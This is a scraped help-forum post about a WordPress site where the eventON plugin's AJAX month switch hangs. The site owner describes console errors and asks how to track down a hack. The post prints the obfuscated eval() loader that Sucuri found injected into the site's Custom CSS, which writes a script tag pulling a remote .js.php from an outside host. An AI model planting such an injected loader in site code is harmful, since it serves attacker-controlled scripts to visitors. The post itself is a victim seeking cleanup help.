科技改变生活-雨落星辰 - 所有的伟大,都源于一个勇敢的开始

    最新消息:雨落星辰是一个专注网站SEO优化、网站SEO诊断、搜索引擎研究、网络营销推广、网站策划运营及站长类的自媒体原创博客
    你的位置: 首页>programmer>errors - eventON plugin AJAX call triggers website crash

    errors - eventON plugin AJAX call triggers website crash

    programmeradmin0浏览0评论

    The eventON event listing plugin causes our website to crash when switching between months. The browser indicates that it is trying to load the site, but nothing ever appears. The plugin is inserted using this shortcode: [add_eventon_list show_limit="yes" event_count="10" hide_past="yes" event_type="1082" accord="yes" ]. The AJAX request through WordPress returns a 200 response, so the script seems to have worked. The AJAX function's URL seems to be what is causing the issue. I have reviewed the plugin's register and localize script code, but nothing is standing out to me. No other JavaScript errors are being displayed in the console.

    Website: 

    wp_register_script('evcal_ajax_handle', $eventon->assets_path. 'js/eventon_script.js', array('jquery'), $eventon->version ,true );
wp_localize_script( 
    'evcal_ajax_handle', 
    'the_ajax_script', 
        array( 
            'ajaxurl' => admin_url( 'admin-ajax.php' ) , 
            'postnonce' => wp_create_nonce( 'eventon_nonce' )
        )
);

    Firefox console:

    • SyntaxError: identifier starts immediately after numeric literal
    • Blocked loading mixed active content .js.php

    I understand that this may be a mixed content issue as our website is HTTPS, but other child sites using the same code via WP Network on the same domain are working with no errors. I am not sure why browsers are using an IP address to load jQuery via a PHP script.

    This is the offending code as highlighted by Sucuri:

    Welcome eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|andfs|var|u0026u|referrer|hseaf||js|php'.split('|'),0,{}))

    to Custom CSS!

    I have tried using find and grep commands to find the offending code using SSH, but so far no luck. Does anyone have suggestions for tracking down this type of hack?

    Chrome console:

    • Uncaught SyntaxError: Invalid or unexpected token

    与本文相关的文章

    发布评论

    评论列表(0)

    1. 暂无评论